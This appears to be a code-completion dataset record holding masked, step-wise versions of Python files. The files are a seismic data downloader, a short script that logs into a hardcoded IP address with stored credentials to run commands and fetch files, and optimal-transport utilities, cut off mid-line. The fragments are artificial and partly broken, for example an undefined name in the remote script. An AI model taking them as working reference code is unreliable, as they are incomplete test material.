"step-5": "\"\"\"\n@version:\nauthor:yunnaidan\n@time: 2019/07/22\n@file: download_mseed.py\n@function:\n\"\"\"\nfrom obspy.clients.fdsn import Client\nfrom obspy.core import UTCDateTime\nimport numpy as np\nimport obspy\nimport os\nimport re\nimport time\nimport glob\nimport shutil\nimport platform\nimport subprocess\nimport multiprocessing\n\n\ndef load_stations(filename):\n with open(filename, 'r') as f:\n sta_data = f.readlines()\n sta_list = []\n for l in range(1, len(sta_data)):\n sta_info = sta_data[l]\n net_name = re.split(',', sta_info)[0]\n sta_name = re.split(',', sta_info)[1]\n chan_name = re.split(',', sta_info)[2]\n sta_list.append([net_name, sta_name, chan_name])\n\n return sta_list\n\n\ndef set_folders(out_path, startday, endday):\n day = startday\n while day <= endday:\n year_folder = str(day.year).zfill(4)\n day_folder = str(day.year).zfill(\n 4) + str(day.month).zfill(2) + str(day.day).zfill(2)\n out_folder = os.path.join(out_path, year_folder, day_folder)\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n\n day = day + 86400\n\n return None\n\n\ndef obspy_download(\n client,\n net_name,\n sta_name,\n chn_name,\n starttime,\n endtime,\n out_path,\n time_thre=10):\n year_folder = str(starttime.year)\n day_folder = str(starttime.year).zfill(\n 4) + str(starttime.month).zfill(2) + str(starttime.day).zfill(2)\n out_folder = os.path.join(out_path, year_folder, day_folder)\n\n outfile = os.path.join(\n out_folder, net_name + '.' + sta_name + '.' + chn_name + '.mseed')\n # Incremental download\n if not os.path.exists(outfile):\n t = 0\n flag = False\n while flag == False and t < time_thre:\n try:\n client.get_waveforms(\n network=net_name,\n station=sta_name,\n location='--',\n channel=chn_name,\n starttime=starttime,\n endtime=endtime,\n filename=outfile)\n flag = True\n except BaseException:\n pass\n time.sleep(0.5)\n t += 1\n\n if not flag:\n with open('download.log', 'a') as f:\n f.write('No data: ' + outfile + '\\n')\n\n return None\n\n\ndef obspy_download_parallel(\n data_center,\n startday,\n endday,\n sta_file,\n out_path,\n cores=1):\n\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n f.write('The number of stations is: ' + str(len(sta_list)) + '\\n')\n\n day = startday\n while day <= endday:\n t_b = time.time()\n with open('download.log', 'a') as f:\n f.write('Day: ' + str(day) + '\\n')\n print(day)\n starttime = day\n endtime = day + 86400\n\n client = Client(data_center)\n\n if cores == 1:\n for i in range(len(sta_list)):\n sta = sta_list[i]\n print (sta)\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n obspy_download(\n client,\n net_name,\n sta_name,\n chan_name,\n starttime,\n endtime,\n out_path)\n else:\n pass\n\n t_e = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(t_e - t_b) + '\\n')\n day = day + 86400\n\n return None\n\n\ndef stp_run_download(sta_list, download_date, out_path):\n with open('download.log', 'a') as f:\n f.write(str(download_date) + '\\n')\n\n tb = time.time()\n year = str(download_date.year).zfill(4)\n month = str(download_date.month).zfill(2)\n day = str(download_date.day).zfill(2)\n day_folder = year + month + day\n out_folder = os.path.join(out_path, year, day_folder)\n\n out_folder_old = os.path.join(out_path + '_old', year, day_folder)\n\n p = subprocess.Popen(['stp'], stdin=subprocess.PIPE)\n s = \"MSEED \\n\"\n\n for i in range(len(sta_list)):\n\n sta = sta_list[i]\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n\n out_sta_file = glob.glob(\n os.path.join(\n out_folder_old, '*%s.%s.%s*' %\n (net_name, sta_name, chan_name)))\n\n if len(out_sta_file) == 0:\n s += \"WIN {} {} {} {}/{}/{},00:00:00 +1d \\n\".format(\n net_name, sta_name, chan_name, year, month, day)\n\n s += \"quit \\n\"\n p.communicate(s.encode())\n\n out_files = glob.glob('%s%s%s*.*' % (year, month, day))\n for out_file in out_files:\n shutil.move(out_file, out_folder)\n\n te = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(te - tb) + '\\n')\n\n\ndef stp_download_parallel(startday, endday, sta_file, out_path, cores=1):\n '''\n\n :param startday: obspy.core.utcdatetime.UTCDateTime\n :param endday: obspy.core.utcdatetime.UTCDateTime\n :param sta_file: Network,Station,Channel,Latitude,Longitude\n :param out_path:\n :param cores:\n :return:\n '''\n if os.path.exists('download.log'):\n os.remove('download.log')\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n\n pool = multiprocessing.Pool(processes=cores)\n tasks = []\n\n day = startday\n while day <= endday:\n print(day)\n # tasks.append((sta_list, day, out_path))\n stp_run_download(sta_list, day, out_path)\n day = day + 86400\n\n '''\n # chunksize is how many tasks will be processed by one processor\n rs = pool.starmap_async(stp_run_download, tasks, chunksize=1)\n # close() & join() is necessary\n # No more work\n pool.close()\n\n # simple progress bar\n while (True):\n remaining = rs._number_left\n print(\"finished:{0}/{1}\".format(len(tasks) - remaining, len(tasks)),\n end='\\r') # '\\r' means remove the last line\n if (rs.ready()):\n break\n time.sleep(0.5)\n\n # Wait for completion\n pool.join()\n '''\n\n return None\n\n\nif __name__ == '__main__':\n LOCAL_PATH = '/Users/yunnaidan/Project/Dynamic_Triggering/Workspace/Central_California'\n REMOTE_PATH = '/home/yunnd/Workspace/Dynamic_triggering/Central_California'\n if platform.system() == 'Darwin':\n ROOT_PATH = LOCAL_PATH\n if platform.system() == 'Linux':\n ROOT_PATH = REMOTE_PATH\n\n startday = UTCDateTime('2009-01-03')\n endday = UTCDateTime('2009-01-05')\n\n sta_file = os.path.join(\n ROOT_PATH,\n 'data/station_info/stations_CI_selected_for_download_BH.txt')\n\n out_path = os.path.join(ROOT_PATH, 'data/time_series/raw_data/mseed')\n data_center = 'SCEDC'\n obspy_download_parallel(\n data_center,\n startday,\n endday,\n sta_file,\n out_path,\n cores=1)\n # stp_download_parallel(startday, endday, sta_file, out_path, cores=15)\n\n pass\n",
"step-ids": [
3,
5,
6,
7,
9
]
}
|
[
3,
5,
6,
7,
9
] |
from connection import Machine
from credentials import get_credentials
targets = ['45.32.13.245']
#targets = ['localhost']
input_file = 'cmd'
def main():
global targets
username, password = get_credentials('laozi')
remote_host = Machine(username, password)
for target in targets:
remote_host.connect(target)
stdin, stdout = remote_host.create_channel(target, input_file)
slb.send_cmd(stdin, stdout, input_file)
remote_dir = input('Which directory should I list?')
remote_host.list_content(remote_dir)
remote_file = input('Which file should I retrieve?')
for f in remote_file:
remote_host.retrieve(remote_dir, remote_file)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "18bc8a8b1cbb544cfbe581e32ee5e509d67beafd",
"index": 1410,
"step-1": "<mask token>\n\n\ndef main():\n global targets\n username, password = get_credentials('laozi')\n remote_host = Machine(username, password)\n for target in targets:\n remote_host.connect(target)\n stdin, stdout = remote_host.create_channel(target, input_file)\n slb.send_cmd(stdin, stdout, input_file)\n remote_dir = input('Which directory should I list?')\n remote_host.list_content(remote_dir)\n remote_file = input('Which file should I retrieve?')\n for f in remote_file:\n remote_host.retrieve(remote_dir, remote_file)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n global targets\n username, password = get_credentials('laozi')\n remote_host = Machine(username, password)\n for target in targets:\n remote_host.connect(target)\n stdin, stdout = remote_host.create_channel(target, input_file)\n slb.send_cmd(stdin, stdout, input_file)\n remote_dir = input('Which directory should I list?')\n remote_host.list_content(remote_dir)\n remote_file = input('Which file should I retrieve?')\n for f in remote_file:\n remote_host.retrieve(remote_dir, remote_file)\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\ntargets = ['45.32.13.245']\ninput_file = 'cmd'\n\n\ndef main():\n global targets\n username, password = get_credentials('laozi')\n remote_host = Machine(username, password)\n for target in targets:\n remote_host.connect(target)\n stdin, stdout = remote_host.create_channel(target, input_file)\n slb.send_cmd(stdin, stdout, input_file)\n remote_dir = input('Which directory should I list?')\n remote_host.list_content(remote_dir)\n remote_file = input('Which file should I retrieve?')\n for f in remote_file:\n remote_host.retrieve(remote_dir, remote_file)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from connection import Machine\nfrom credentials import get_credentials\ntargets = ['45.32.13.245']\ninput_file = 'cmd'\n\n\ndef main():\n global targets\n username, password = get_credentials('laozi')\n remote_host = Machine(username, password)\n for target in targets:\n remote_host.connect(target)\n stdin, stdout = remote_host.create_channel(target, input_file)\n slb.send_cmd(stdin, stdout, input_file)\n remote_dir = input('Which directory should I list?')\n remote_host.list_content(remote_dir)\n remote_file = input('Which file should I retrieve?')\n for f in remote_file:\n remote_host.retrieve(remote_dir, remote_file)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from connection import Machine\nfrom credentials import get_credentials\n\ntargets = ['45.32.13.245']\n#targets = ['localhost']\ninput_file = 'cmd'\n\ndef main():\n global targets\n username, password = get_credentials('laozi')\n remote_host = Machine(username, password)\n for target in targets:\n remote_host.connect(target)\n stdin, stdout = remote_host.create_channel(target, input_file)\n slb.send_cmd(stdin, stdout, input_file)\n remote_dir = input('Which directory should I list?')\n remote_host.list_content(remote_dir)\n remote_file = input('Which file should I retrieve?')\n for f in remote_file:\n remote_host.retrieve(remote_dir, remote_file)\n\nif __name__ == '__main__':\n main()\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from __future__ import print_function
import ot
import torch
import numpy as np
from sklearn.neighbors import KernelDensity
from torch.utils.data import Dataset
import jacinle.io as io
import optimal_transport_modules.pytorch_utils as PTU
import optimal_transport_modules.generate_data as g_data
from optimal_transport_modules.record_mean_cov import select_mean_and_cov
'''
PyTorch type
'''
def kde_Gaussian_fitting(miu, bandwidth):
kde_analyzer = KernelDensity(
kernel='gaussian', bandwidth=bandwidth).fit(miu)
return kde_analyzer
def second_moment_no_average(batch_dim):
return batch_dim.pow(2).sum(dim=1)
def second_moment_single_dist(batch_dim):
return batch_dim.pow(2).sum(dim=1).mean()
def second_moment_all_dist(batch_dim_dist):
return batch_dim_dist.pow(2).sum(dim=1).mean(dim=0)
def inprod_average(batch_dim_1, batch_dim_2):
assert batch_dim_1.shape[0] == batch_dim_2.shape[0]
batch_size = batch_dim_1.shape[0]
inner_product_avg = torch.dot(batch_dim_1.reshape(-1),
batch_dim_2.reshape(-1)) / batch_size
return inner_product_avg
def inprod(batch_dim_1, batch_dim_2):
innner_product = torch.dot(batch_dim_1.reshape(-1),
batch_dim_2.reshape(-1))
return innner_product
def grad_of_function(input_samples, network):
g_of_y = network(input_samples).sum()
gradient = torch.autograd.grad(
g_of_y, input_samples, create_graph=True)[0]
return gradient
def two_loop_loss_in_W2(convex_f_list, grad_g_of_y, miu_i, dist_weight, idx_dist):
n_dist = dist_weight.shape[0]
#! The 2nd loss part useful for f/g parameters
f_grad_g_y = convex_f_list[idx_dist](grad_g_of_y).mean()
#! The 4th loss part useful for f/g parameters
for j in range(n_dist):
f_grad_g_y -= dist_weight[j] * convex_f_list[j](grad_g_of_y).mean()
#! The 1st loss part useful for g parameters
inner_product = inprod_average(grad_g_of_y, miu_i)
#! The 3rd loss part useful for g parameters
half_moment_grad_of_g = 0.5 * second_moment_single_dist(grad_g_of_y)
loss_gi = (f_grad_g_y - inner_product +
half_moment_grad_of_g) * dist_weight[idx_dist]
return loss_gi
'''
localized POT library
'''
def w2_distance_samples_solver(sample1_n_d, sample2_n_d):
# see here for details
# https://pythonot.github.io/all.html#ot.emd
# https://pythonot.github.io/all.html#ot.emd2
assert sample1_n_d.shape == sample2_n_d.shape
num_sample = sample1_n_d.shape[0]
a = np.ones([num_sample]) / num_sample
b = np.ones([num_sample]) / num_sample
tmp_marginal_1 = np.expand_dims(sample1_n_d, axis=0)
tmp_marginal_2 = np.expand_dims(sample2_n_d, axis=1)
M = tmp_marginal_1 - tmp_marginal_2
M = np.sum(np.abs(M)**2, axis=2)
return ot.emd2(a, b, M)
def free_support_barycenter(measures_locations, measures_weights, X_init, b=None, weights=None, numItermax=100, stopThr=1e-7, use_sinkhorn=False):
g_sinkhorn_reg = 0.1
iter_count = 0
N = len(measures_locations)
k = X_init.shape[0]
d = X_init.shape[1]
if b is None:
b = np.ones((k,)) / k
if weights is None:
weights = np.ones((N,)) / N
X = X_init
log_dict = {}
displacement_square_norm = stopThr + 1.
while (displacement_square_norm > stopThr and iter_count < numItermax):
T_sum = np.zeros((k, d))
for (measure_locations_i, measure_weights_i, weight_i) in zip(measures_locations, measures_weights, weights.tolist()):
M_i = ot.dist(X, measure_locations_i)
if use_sinkhorn:
T_i = ot.bregman.sinkhorn(
b, measure_weights_i, M_i, g_sinkhorn_reg)
else:
T_i = ot.emd(b, measure_weights_i, M_i)
T_sum = T_sum + weight_i * \
np.reshape(1. / b, (-1, 1)) * \
np.matmul(T_i, measure_locations_i)
displacement_square_norm = np.sum(np.square(T_sum - X))
X = T_sum
print('iteration %d, displacement_square_norm=%f\n',
iter_count, displacement_square_norm)
iter_count += 1
return X
'''
MNIST utils
'''
class ReshapeTransform:
def __init__(self, new_size):
self.new_size = new_size
def __call__(self, img):
return torch.reshape(img, self.new_size)
# def extract_three_number(total_data):
# idx_train = (total_data.targets == 0) + (total_data.targets ==
# 1) + (total_data.targets == 7)
# total_data.targets = total_data.targets[idx_train]
# total_data.data = total_data.data[idx_train]
# return total_data
class CustomMnistDataset(Dataset):
def __init__(self, data, target, transform=None):
self.data = data
self.target = target
self.transform = transform
def __len__(self):
assert len(self.target) == len(self.data)
return len(self.target)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
data_idxed = self.data[idx]
target_idxed = self.target[idx].float()
# sample = {'data': data_idxed, 'target': target_idxed}
if self.transform:
data_idxed = self.transform(data_idxed)
return [data_idxed, target_idxed]
'''
Gaussian utils
'''
def get_gmm_param(trial, cond=-1):
if cond > 0:
MEAN, COV = select_mean_and_cov(trial, range_cond=cond)
else:
MEAN, COV = select_mean_and_cov(trial)
INPUT_DIM = MEAN[0].shape[1]
OUTPUT_DIM = INPUT_DIM
NUM_DISTRIBUTION = len(MEAN)
NUM_GMM_COMPONENT = []
for i in range(NUM_DISTRIBUTION):
NUM_GMM_COMPONENT.append(MEAN[i].shape[0])
high_dim_flag = INPUT_DIM > 2
return MEAN, COV, INPUT_DIM, OUTPUT_DIM, NUM_DISTRIBUTION, NUM_GMM_COMPONENT, high_dim_flag
'''
Average the 2 layer neural networks
'''
def average_nn(args, **kwargs):
averaged_parameters = np.zeros([args.N_SAMPLES, args.INPUT_DIM])
tmp_data = averaged_parameters
n_samp_of_subset = int(args.N_SAMPLES / args.NUM_DISTRIBUTION)
for i in range(args.NUM_DISTRIBUTION):
model_param = io.load(args.get_nn(**kwargs) +
f"/subset_{i+1}_samples_{args.subset_samples}/trial_26/storing_models/nn_2layer_epoch200.pt")
assert args.N_SAMPLES == model_param['layer1.weight'].shape[0]
tmp_data[:, :-1] = PTU.torch2numpy(model_param['layer1.weight'])
tmp_data[:, -
1] = PTU.torch2numpy(model_param['last_layer.weight'].squeeze())
if i == args.NUM_DISTRIBUTION - 1:
averaged_parameters[(i * n_samp_of_subset)
:] = tmp_data[(i * n_samp_of_subset):]
else:
averaged_parameters[i * n_samp_of_subset:
(i + 1) * n_samp_of_subset] = tmp_data[i * n_samp_of_subset:
(i + 1) * n_samp_of_subset]
return averaged_parameters
'''
get marginal data handle
'''
def get_marginal_list(cfg, type_data='2block'):
if type_data == '2block':
marginal_data = g_data.marginal_data_blocks_3loop_ficnn(
cfg)[:, :, :-1]
elif type_data == 'circ_squa':
marginal_data = g_data.marginal_data_circ_squ_3loop_ficnn(
cfg)[:, :, :-1]
elif type_data == 'mnist0-1':
marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(
cfg)
elif type_data == '3digit':
marginal_data = g_data.marginal_data_3digit_3loop_ficnn(
cfg)[:, :, :-1]
elif type_data == 'ellipse':
marginal_data = g_data.marginal_data_ellipse_3loop_ficnn(
cfg)[:, :, :-1]
elif type_data == 'line':
marginal_data = g_data.marginal_data_line_3loop_ficnn(
cfg)[:, :, :-1]
elif type_data == 'usps_mnist':
marginal_data = g_data.marginal_usps_3loop_ficnn_handle(
cfg)[0][torch.randperm(5000), :, :-1]
elif type_data == 'mnist_group':
if cfg.N_TEST == 25:
idx_digit = torch.zeros(25).long()
for idx in range(5):
idx_digit[idx * 5:(idx + 1) * 5] = 5000 * idx + torch.arange(5)
marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(
cfg)[idx_digit]
else:
marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(
cfg)[torch.randperm(25000)]
elif type_data == 'cifar':
marginal_data = g_data.marginal_cifar_handle(cfg)
elif type_data == 'gmm':
marginal_data = g_data.marginal_data_gmm_3loop_ficnn(
cfg)[:, :, :-1]
return marginal_data.permute(2, 0, 1)
|
normal
|
{
"blob_id": "0ee902d59d3d01b6ec8bb4cc8d5e8aa583644397",
"index": 1298,
"step-1": "<mask token>\n\n\ndef kde_Gaussian_fitting(miu, bandwidth):\n kde_analyzer = KernelDensity(kernel='gaussian', bandwidth=bandwidth).fit(\n miu)\n return kde_analyzer\n\n\n<mask token>\n\n\ndef second_moment_all_dist(batch_dim_dist):\n return batch_dim_dist.pow(2).sum(dim=1).mean(dim=0)\n\n\ndef inprod_average(batch_dim_1, batch_dim_2):\n assert batch_dim_1.shape[0] == batch_dim_2.shape[0]\n batch_size = batch_dim_1.shape[0]\n inner_product_avg = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.\n reshape(-1)) / batch_size\n return inner_product_avg\n\n\ndef inprod(batch_dim_1, batch_dim_2):\n innner_product = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.reshape(-1)\n )\n return innner_product\n\n\n<mask token>\n\n\ndef w2_distance_samples_solver(sample1_n_d, sample2_n_d):\n assert sample1_n_d.shape == sample2_n_d.shape\n num_sample = sample1_n_d.shape[0]\n a = np.ones([num_sample]) / num_sample\n b = np.ones([num_sample]) / num_sample\n tmp_marginal_1 = np.expand_dims(sample1_n_d, axis=0)\n tmp_marginal_2 = np.expand_dims(sample2_n_d, axis=1)\n M = tmp_marginal_1 - tmp_marginal_2\n M = np.sum(np.abs(M) ** 2, axis=2)\n return ot.emd2(a, b, M)\n\n\n<mask token>\n\n\nclass ReshapeTransform:\n\n def __init__(self, new_size):\n self.new_size = new_size\n\n def __call__(self, img):\n return torch.reshape(img, self.new_size)\n\n\nclass CustomMnistDataset(Dataset):\n\n def __init__(self, data, target, transform=None):\n self.data = data\n self.target = target\n self.transform = transform\n\n def __len__(self):\n assert len(self.target) == len(self.data)\n return len(self.target)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n data_idxed = self.data[idx]\n target_idxed = self.target[idx].float()\n if self.transform:\n data_idxed = self.transform(data_idxed)\n return [data_idxed, target_idxed]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef kde_Gaussian_fitting(miu, bandwidth):\n kde_analyzer = KernelDensity(kernel='gaussian', bandwidth=bandwidth).fit(\n miu)\n return kde_analyzer\n\n\n<mask token>\n\n\ndef second_moment_all_dist(batch_dim_dist):\n return batch_dim_dist.pow(2).sum(dim=1).mean(dim=0)\n\n\ndef inprod_average(batch_dim_1, batch_dim_2):\n assert batch_dim_1.shape[0] == batch_dim_2.shape[0]\n batch_size = batch_dim_1.shape[0]\n inner_product_avg = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.\n reshape(-1)) / batch_size\n return inner_product_avg\n\n\ndef inprod(batch_dim_1, batch_dim_2):\n innner_product = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.reshape(-1)\n )\n return innner_product\n\n\ndef grad_of_function(input_samples, network):\n g_of_y = network(input_samples).sum()\n gradient = torch.autograd.grad(g_of_y, input_samples, create_graph=True)[0]\n return gradient\n\n\n<mask token>\n\n\ndef w2_distance_samples_solver(sample1_n_d, sample2_n_d):\n assert sample1_n_d.shape == sample2_n_d.shape\n num_sample = sample1_n_d.shape[0]\n a = np.ones([num_sample]) / num_sample\n b = np.ones([num_sample]) / num_sample\n tmp_marginal_1 = np.expand_dims(sample1_n_d, axis=0)\n tmp_marginal_2 = np.expand_dims(sample2_n_d, axis=1)\n M = tmp_marginal_1 - tmp_marginal_2\n M = np.sum(np.abs(M) ** 2, axis=2)\n return ot.emd2(a, b, M)\n\n\n<mask token>\n\n\nclass ReshapeTransform:\n\n def __init__(self, new_size):\n self.new_size = new_size\n\n def __call__(self, img):\n return torch.reshape(img, self.new_size)\n\n\nclass CustomMnistDataset(Dataset):\n\n def __init__(self, data, target, transform=None):\n self.data = data\n self.target = target\n self.transform = transform\n\n def __len__(self):\n assert len(self.target) == len(self.data)\n return len(self.target)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n data_idxed = self.data[idx]\n target_idxed = self.target[idx].float()\n if self.transform:\n data_idxed = self.transform(data_idxed)\n return [data_idxed, target_idxed]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef kde_Gaussian_fitting(miu, bandwidth):\n kde_analyzer = KernelDensity(kernel='gaussian', bandwidth=bandwidth).fit(\n miu)\n return kde_analyzer\n\n\n<mask token>\n\n\ndef second_moment_single_dist(batch_dim):\n return batch_dim.pow(2).sum(dim=1).mean()\n\n\ndef second_moment_all_dist(batch_dim_dist):\n return batch_dim_dist.pow(2).sum(dim=1).mean(dim=0)\n\n\ndef inprod_average(batch_dim_1, batch_dim_2):\n assert batch_dim_1.shape[0] == batch_dim_2.shape[0]\n batch_size = batch_dim_1.shape[0]\n inner_product_avg = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.\n reshape(-1)) / batch_size\n return inner_product_avg\n\n\ndef inprod(batch_dim_1, batch_dim_2):\n innner_product = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.reshape(-1)\n )\n return innner_product\n\n\ndef grad_of_function(input_samples, network):\n g_of_y = network(input_samples).sum()\n gradient = torch.autograd.grad(g_of_y, input_samples, create_graph=True)[0]\n return gradient\n\n\ndef two_loop_loss_in_W2(convex_f_list, grad_g_of_y, miu_i, dist_weight,\n idx_dist):\n n_dist = dist_weight.shape[0]\n f_grad_g_y = convex_f_list[idx_dist](grad_g_of_y).mean()\n for j in range(n_dist):\n f_grad_g_y -= dist_weight[j] * convex_f_list[j](grad_g_of_y).mean()\n inner_product = inprod_average(grad_g_of_y, miu_i)\n half_moment_grad_of_g = 0.5 * second_moment_single_dist(grad_g_of_y)\n loss_gi = (f_grad_g_y - inner_product + half_moment_grad_of_g\n ) * dist_weight[idx_dist]\n return loss_gi\n\n\n<mask token>\n\n\ndef w2_distance_samples_solver(sample1_n_d, sample2_n_d):\n assert sample1_n_d.shape == sample2_n_d.shape\n num_sample = sample1_n_d.shape[0]\n a = np.ones([num_sample]) / num_sample\n b = np.ones([num_sample]) / num_sample\n tmp_marginal_1 = np.expand_dims(sample1_n_d, axis=0)\n tmp_marginal_2 = np.expand_dims(sample2_n_d, axis=1)\n M = tmp_marginal_1 - tmp_marginal_2\n M = np.sum(np.abs(M) ** 2, axis=2)\n return ot.emd2(a, b, M)\n\n\n<mask token>\n\n\nclass ReshapeTransform:\n\n def __init__(self, new_size):\n self.new_size = new_size\n\n def __call__(self, img):\n return torch.reshape(img, self.new_size)\n\n\nclass CustomMnistDataset(Dataset):\n\n def __init__(self, data, target, transform=None):\n self.data = data\n self.target = target\n self.transform = transform\n\n def __len__(self):\n assert len(self.target) == len(self.data)\n return len(self.target)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n data_idxed = self.data[idx]\n target_idxed = self.target[idx].float()\n if self.transform:\n data_idxed = self.transform(data_idxed)\n return [data_idxed, target_idxed]\n\n\n<mask token>\n\n\ndef average_nn(args, **kwargs):\n averaged_parameters = np.zeros([args.N_SAMPLES, args.INPUT_DIM])\n tmp_data = averaged_parameters\n n_samp_of_subset = int(args.N_SAMPLES / args.NUM_DISTRIBUTION)\n for i in range(args.NUM_DISTRIBUTION):\n model_param = io.load(args.get_nn(**kwargs) +\n f'/subset_{i + 1}_samples_{args.subset_samples}/trial_26/storing_models/nn_2layer_epoch200.pt'\n )\n assert args.N_SAMPLES == model_param['layer1.weight'].shape[0]\n tmp_data[:, :-1] = PTU.torch2numpy(model_param['layer1.weight'])\n tmp_data[:, -1] = PTU.torch2numpy(model_param['last_layer.weight'].\n squeeze())\n if i == args.NUM_DISTRIBUTION - 1:\n averaged_parameters[i * n_samp_of_subset:] = tmp_data[i *\n n_samp_of_subset:]\n else:\n averaged_parameters[i * n_samp_of_subset:(i + 1) * n_samp_of_subset\n ] = tmp_data[i * n_samp_of_subset:(i + 1) * n_samp_of_subset]\n return averaged_parameters\n\n\n<mask token>\n\n\ndef get_marginal_list(cfg, type_data='2block'):\n if type_data == '2block':\n marginal_data = g_data.marginal_data_blocks_3loop_ficnn(cfg)[:, :, :-1]\n elif type_data == 'circ_squa':\n marginal_data = g_data.marginal_data_circ_squ_3loop_ficnn(cfg)[:, :,\n :-1]\n elif type_data == 'mnist0-1':\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(cfg)\n elif type_data == '3digit':\n marginal_data = g_data.marginal_data_3digit_3loop_ficnn(cfg)[:, :, :-1]\n elif type_data == 'ellipse':\n marginal_data = g_data.marginal_data_ellipse_3loop_ficnn(cfg)[:, :, :-1\n ]\n elif type_data == 'line':\n marginal_data = g_data.marginal_data_line_3loop_ficnn(cfg)[:, :, :-1]\n elif type_data == 'usps_mnist':\n marginal_data = g_data.marginal_usps_3loop_ficnn_handle(cfg)[0][\n torch.randperm(5000), :, :-1]\n elif type_data == 'mnist_group':\n if cfg.N_TEST == 25:\n idx_digit = torch.zeros(25).long()\n for idx in range(5):\n idx_digit[idx * 5:(idx + 1) * 5] = 5000 * idx + torch.arange(5)\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(cfg)[\n idx_digit]\n else:\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(cfg)[torch\n .randperm(25000)]\n elif type_data == 'cifar':\n marginal_data = g_data.marginal_cifar_handle(cfg)\n elif type_data == 'gmm':\n marginal_data = g_data.marginal_data_gmm_3loop_ficnn(cfg)[:, :, :-1]\n return marginal_data.permute(2, 0, 1)\n",
"step-4": "from __future__ import print_function\nimport ot\nimport torch\nimport numpy as np\nfrom sklearn.neighbors import KernelDensity\nfrom torch.utils.data import Dataset\nimport jacinle.io as io\nimport optimal_transport_modules.pytorch_utils as PTU\nimport optimal_transport_modules.generate_data as g_data\nfrom optimal_transport_modules.record_mean_cov import select_mean_and_cov\n<mask token>\n\n\ndef kde_Gaussian_fitting(miu, bandwidth):\n kde_analyzer = KernelDensity(kernel='gaussian', bandwidth=bandwidth).fit(\n miu)\n return kde_analyzer\n\n\ndef second_moment_no_average(batch_dim):\n return batch_dim.pow(2).sum(dim=1)\n\n\ndef second_moment_single_dist(batch_dim):\n return batch_dim.pow(2).sum(dim=1).mean()\n\n\ndef second_moment_all_dist(batch_dim_dist):\n return batch_dim_dist.pow(2).sum(dim=1).mean(dim=0)\n\n\ndef inprod_average(batch_dim_1, batch_dim_2):\n assert batch_dim_1.shape[0] == batch_dim_2.shape[0]\n batch_size = batch_dim_1.shape[0]\n inner_product_avg = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.\n reshape(-1)) / batch_size\n return inner_product_avg\n\n\ndef inprod(batch_dim_1, batch_dim_2):\n innner_product = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.reshape(-1)\n )\n return innner_product\n\n\ndef grad_of_function(input_samples, network):\n g_of_y = network(input_samples).sum()\n gradient = torch.autograd.grad(g_of_y, input_samples, create_graph=True)[0]\n return gradient\n\n\ndef two_loop_loss_in_W2(convex_f_list, grad_g_of_y, miu_i, dist_weight,\n idx_dist):\n n_dist = dist_weight.shape[0]\n f_grad_g_y = convex_f_list[idx_dist](grad_g_of_y).mean()\n for j in range(n_dist):\n f_grad_g_y -= dist_weight[j] * convex_f_list[j](grad_g_of_y).mean()\n inner_product = inprod_average(grad_g_of_y, miu_i)\n half_moment_grad_of_g = 0.5 * second_moment_single_dist(grad_g_of_y)\n loss_gi = (f_grad_g_y - inner_product + half_moment_grad_of_g\n ) * dist_weight[idx_dist]\n return loss_gi\n\n\n<mask token>\n\n\ndef w2_distance_samples_solver(sample1_n_d, sample2_n_d):\n assert sample1_n_d.shape == sample2_n_d.shape\n num_sample = sample1_n_d.shape[0]\n a = np.ones([num_sample]) / num_sample\n b = np.ones([num_sample]) / num_sample\n tmp_marginal_1 = np.expand_dims(sample1_n_d, axis=0)\n tmp_marginal_2 = np.expand_dims(sample2_n_d, axis=1)\n M = tmp_marginal_1 - tmp_marginal_2\n M = np.sum(np.abs(M) ** 2, axis=2)\n return ot.emd2(a, b, M)\n\n\ndef free_support_barycenter(measures_locations, measures_weights, X_init, b\n =None, weights=None, numItermax=100, stopThr=1e-07, use_sinkhorn=False):\n g_sinkhorn_reg = 0.1\n iter_count = 0\n N = len(measures_locations)\n k = X_init.shape[0]\n d = X_init.shape[1]\n if b is None:\n b = np.ones((k,)) / k\n if weights is None:\n weights = np.ones((N,)) / N\n X = X_init\n log_dict = {}\n displacement_square_norm = stopThr + 1.0\n while displacement_square_norm > stopThr and iter_count < numItermax:\n T_sum = np.zeros((k, d))\n for measure_locations_i, measure_weights_i, weight_i in zip(\n measures_locations, measures_weights, weights.tolist()):\n M_i = ot.dist(X, measure_locations_i)\n if use_sinkhorn:\n T_i = ot.bregman.sinkhorn(b, measure_weights_i, M_i,\n g_sinkhorn_reg)\n else:\n T_i = ot.emd(b, 